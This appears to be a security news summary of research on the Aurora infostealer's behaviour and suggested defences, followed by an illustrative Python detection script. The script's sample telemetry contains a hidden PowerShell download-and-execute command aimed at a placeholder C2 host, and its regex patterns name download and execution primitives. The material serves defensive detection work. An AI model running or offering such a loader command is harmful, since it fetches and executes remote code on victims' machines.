On Monday researchers at SEKOIA.IO released a paper detailing their observations and research on Aurora, an infostealer malware whose popularity with cybergangs is surging because of its low profile. Originally developed as a botnet in April 2022, the malware was repositioned by its developers sometime between July and September 2022 to operate exclusively as an infostealer, with the new functionality advertised on Telegram and underground forums. SEKOIA.IO has identified at least 7 gangs that include Aurora in their malware lineup, and as a result there are several different documented infection chains distributing it.
Aurora initially fingerprints the system using the Windows Management Instrumentation command-line tool (WMIC). It then attempts to collect data from browsers, browser extensions, and Telegram, and searches several user directories for interesting files to grab. Once the information gathering is complete, Aurora sends messages to the Command and Control (C2) server with the collected information formatted as JSON, followed by base64-encoded copies of every file the grabber selected. Finally, it downloads a remote payload and loads it via PowerShell to continue the attack chain.
Companies can detect Aurora and malware like it by implementing command-line logging and looking for unusual WMIC and PowerShell commands. Additionally, deploying canary files can help detect file-grabber activity, and user behaviour analysis of NetFlow data can help surface anomalous network activity, such as connections to unusual external ports. Application allowlisting can also help prevent the loader activity seen in Aurora.
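The following Python is an added illustration of the command-line logging and canary-file detections described above; it is not code from the article or from SEKOIA.IO's report. It assumes process-creation and file-access telemetry has already been flattened into one JSON object per line (a Sysmon Event ID 1-like shape), and every host name, user, path, URL and allowlist entry in it is constructed for the example. It goes a step beyond the text by also correlating WMIC inventory queries per parent process, since a stealer's fingerprinting shows up as a burst of such queries from one unexpected parent.

```python
import json
import re
from collections import Counter
from typing import Dict, List, Tuple

# Constructed sample telemetry (hypothetical hosts, users and paths; not real data).
# Records 1, 2, 4 and 6 model a dropped executable fingerprinting the host, pulling
# a remote payload via PowerShell, and touching a canary document; 3, 5 and 7 are benign.
SAMPLE_EVENTS = r"""
{"kind":"process","host":"ws01","user":"alice","parent":"C:\\Users\\alice\\AppData\\Local\\Temp\\setup.exe","image":"C:\\Windows\\System32\\wbem\\WMIC.exe","cmdline":"wmic os get Caption,Version,OSArchitecture"}
{"kind":"process","host":"ws01","user":"alice","parent":"C:\\Users\\alice\\AppData\\Local\\Temp\\setup.exe","image":"C:\\Windows\\System32\\wbem\\WMIC.exe","cmdline":"wmic cpu get Name"}
{"kind":"process","host":"ws02","user":"svc_inventory","parent":"C:\\Program Files\\Inventory\\agent.exe","image":"C:\\Windows\\System32\\wbem\\WMIC.exe","cmdline":"wmic os get Caption"}
{"kind":"process","host":"ws01","user":"alice","parent":"C:\\Users\\alice\\AppData\\Local\\Temp\\setup.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage')\""}
{"kind":"process","host":"ws03","user":"bob","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell -File C:\\Scripts\\backup.ps1"}
{"kind":"file","host":"ws01","user":"alice","image":"C:\\Users\\alice\\AppData\\Local\\Temp\\setup.exe","path":"C:\\Users\\alice\\Documents\\passwords-backup.txt"}
{"kind":"file","host":"ws01","user":"SYSTEM","image":"C:\\Windows\\System32\\SearchIndexer.exe","path":"C:\\Users\\alice\\Documents\\passwords-backup.txt"}
"""

# WMI classes typically queried to inventory a host (OS, CPU, board, disks, GPU).
WMIC_INVENTORY = re.compile(
    r"\bwmic\b.*\b(os|cpu|computersystem|baseboard|diskdrive|path\s+win32_videocontroller)\b.*\bget\b",
    re.IGNORECASE,
)
# Download cmdlets/classes and in-memory execution that together look like a loader.
PS_DOWNLOAD = re.compile(r"downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b|net\.webclient", re.IGNORECASE)
PS_EXEC = re.compile(r"\biex\b|invoke-expression", re.IGNORECASE)
PS_ENCODED = re.compile(r"\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE)

# Tuning knobs (all hypothetical): inventory agents allowed to run WMIC queries,
# planted canary documents, and indexers/backup tools allowed to read them.
KNOWN_INVENTORY_PARENTS = {r"c:\program files\inventory\agent.exe"}
CANARY_FILES = {r"c:\users\alice\documents\passwords-backup.txt"}
BENIGN_CANARY_READERS = {r"c:\windows\system32\searchindexer.exe"}


def parse_events(text: str) -> List[Dict[str, str]]:
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_powershell_loader(cmdline: str) -> bool:
    """A download primitive paired with in-memory execution, or a long encoded command."""
    cradle = PS_DOWNLOAD.search(cmdline) is not None and PS_EXEC.search(cmdline) is not None
    return cradle or PS_ENCODED.search(cmdline) is not None


def _alert(rule: str, ev: Dict[str, str], detail: str) -> Dict[str, str]:
    return {"rule": rule, "host": ev["host"], "user": ev["user"],
            "parent": ev.get("parent", ev.get("image", "")), "detail": detail}


def detect(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Apply the three rules and return alerts in event order."""
    alerts = []
    for ev in events:
        image = ev.get("image", "").lower()
        parent = ev.get("parent", "").lower()
        if ev["kind"] == "process":
            cmd = ev.get("cmdline", "")
            if image.endswith("\\wmic.exe") and WMIC_INVENTORY.search(cmd) \
                    and parent not in KNOWN_INVENTORY_PARENTS:
                alerts.append(_alert("wmic_fingerprint", ev, cmd))
            elif image.endswith("\\powershell.exe") and is_powershell_loader(cmd):
                alerts.append(_alert("powershell_loader", ev, cmd))
        elif ev["kind"] == "file":
            if ev.get("path", "").lower() in CANARY_FILES and image not in BENIGN_CANARY_READERS:
                alerts.append(_alert("canary_file_access", ev, ev["path"]))
    return alerts


def fingerprint_bursts(alerts: List[Dict[str, str]], threshold: int = 2) -> Dict[Tuple[str, str], int]:
    """(host, parent) pairs that issued at least `threshold` inventory queries."""
    counts = Counter((a["host"], a["parent"]) for a in alerts if a["rule"] == "wmic_fingerprint")
    return {key: n for key, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    found = detect(parse_events(SAMPLE_EVENTS))
    for a in found:
        print(f'{a["rule"]:<20} {a["host"]} {a["user"]:<8} {a["detail"]}')
    for (host, parent), n in fingerprint_bursts(found).items():
        print(f"burst: {n} inventory queries on {host} from {parent}")
```

The allowlists are where the tuning effort goes in practice: inventory agents, login scripts and backup software legitimately issue the same WMIC queries and read the same user folders, so the per-parent burst count and the canary reader allowlist are what keep the rules from paging on routine administration.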